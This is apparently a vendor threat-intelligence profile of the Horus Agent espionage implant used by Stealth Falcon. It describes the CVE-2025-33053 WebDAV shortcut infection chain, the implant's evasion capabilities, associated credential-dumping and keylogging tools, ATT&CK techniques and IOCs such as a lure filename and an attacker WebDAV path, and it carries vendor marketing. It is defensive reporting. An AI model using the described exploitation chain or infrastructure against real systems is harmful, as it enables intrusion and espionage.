Horus Agent
Horus Agent is a custom espionage implant used by Stealth Falcon (aka FruityArmor, G0038) and built to operate with the Mythic command-and-control framework. Reporting describes it as a private C++ Mythic agent and an evolution or rewrite of the group’s earlier customized Apollo implant used in 2022–2023. It was observed in a multi-stage intrusion chain in which Stealth Falcon exploited CVE-2025-33053, a Windows Internet Shortcut Files/WebDAV remote code execution zero-day, to target high-value organizations, including a major defense organization in Turkey, with broader targeting across government and defense entities in Turkey, Qatar, Egypt, and Yemen.
The infection chain used a phishing-delivered .url file disguised as a PDF, likely sent as an archived attachment. The shortcut abused Windows working-directory/search-order behavior and an attacker-controlled WebDAV server to cause legitimate Windows tooling such as iediagcmd.exe to execute a malicious remote route.exe. That binary installed Horus Loader, which cleaned up prior-stage artifacts, could present a decoy document, and then deployed Horus Agent.
Horus Agent is described as focused on stealth, anti-analysis, and selective activation on valuable targets. Reported capabilities include command execution, system fingerprinting/reconnaissance, configuration changes, file and folder enumeration, file operations including download/upload, shellcode injection into running processes, and controlled exit. The malware polls a Mythic C2 server for instructions, and Stealth Falcon reportedly developed custom Mythic commands for stealth and flexibility. Anti-analysis and evasion features directly mentioned include code virtualization or a custom OLLVM implementation, string encryption, API hashing, and control-flow flattening. Researchers also noted that the newer Horus tooling is more advanced, evasive, and modular than prior Stealth Falcon Apollo-based tooling.
Associated tooling observed in the same campaign included a domain controller credential dumper used to extract Active Directory and credential-related files, a passive backdoor that listens for incoming requests and executes encrypted shellcode payloads, and a custom RC4-encrypted/C++ keylogger. One reported keylogger IOC path was C:/windows/temp/~TN%LogName%.tmp. Additional infrastructure and execution artifacts mentioned in reporting include the lure filename "TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url," the attacker WebDAV path "\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr," and execution of a malicious route.exe from that remote share.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The attack leveraged CVE-2025-33053, a remote code execution vulnerability that allows threat actors to manipulate the working directory of legitimate Windows tools to execute malicious files from attacker-controlled WebDAV servers. Microsoft released a security patch for this vulnerability as part of its June Patch Tuesday updates, following a responsible disclosure by Check Point Research. | The attack delivered a multi-stage infection chain, culminating in the deployment of “Horus Agent,” a custom-built implant for the Mythic command and control framework... Named after the Egyptian falcon-headed sky god, Horus Agent represents an evolution from the group’s previously used customized Apollo implant.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The attack delivered a multi-stage infection chain, culminating in the deployment of “Horus Agent,” a custom-built implant for the Mythic command and control framework... Named after the Egyptian falcon-headed sky god, Horus Agent represents an evolution from the group’s previously used customized Apollo implant.
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniquesThe latest campaign from Stealth Falcon began with phishing emails. In one incident observed by Check Point, hackers targeted a Turkish defense organization...
Check Point uncovered the campaign after a victim uploaded the phishing email attachment to VirusTotal in March. On running the file, Check Point found the malicious file began to harvest diagnostic data and redirected the infected devices' WebDAV path to an attacker-controlled server.
Execution
1 techniqueA sophisticated cyberattack campaign by the advanced persistent threat group, Stealth Falcon, which exploited a previously unknown zero-day vulnerability ... The attack leveraged CVE-2025-33053, a remote code execution vulnerability ...
Privilege Escalation
1 techniqueStealth
4 techniquesThe malware employs advanced anti-analysis techniques, including code virtualization, string encryption, and API hashing, to evade detection.
The malware employs advanced anti-analysis techniques, including code virtualization, string encryption, and API hashing, to evade detection.
This allowed arbitrary code execution through process hollowing, as the malicious route.exe spawned from the WebDAV server, bypassed traditional signature-based defenses.
On execution, it cleaned up previous utilities to evade detection and then deployed a decoy document and the final Horus Agent payload.
Discovery
1 techniqueThe Horus Agent focuses on essential reconnaissance functions, allowing threat actors to fingerprint victim machines and assess their value before deploying more advanced payloads.
Command and Control
2 techniques...the latest version of Horus Agent, a custom-built implant designed to operate with the Mythic C2 command-and-control framework.
Once the connection was established, a malicious file named route.exe executed from the attacker's WebDAV server that deployed the Horus loader.
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware distributed by the Stealth Falcon APT via a remote code execution vulnerability in Internet Shortcut Files.
Horus Agent is a malware deployed by APT Stealth Falcon via exploitation of Internet Shortcut Files RCE vulnerabilities.
Custom backdoor implant for the Mythic C2 framework, used in targeted attacks with anti-analysis and counter-defensive features.
Custom implant used by Stealth Falcon, built on the Mythic C2 framework, designed for stealth, anti-analysis, and selective payload deployment in espionage operations.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.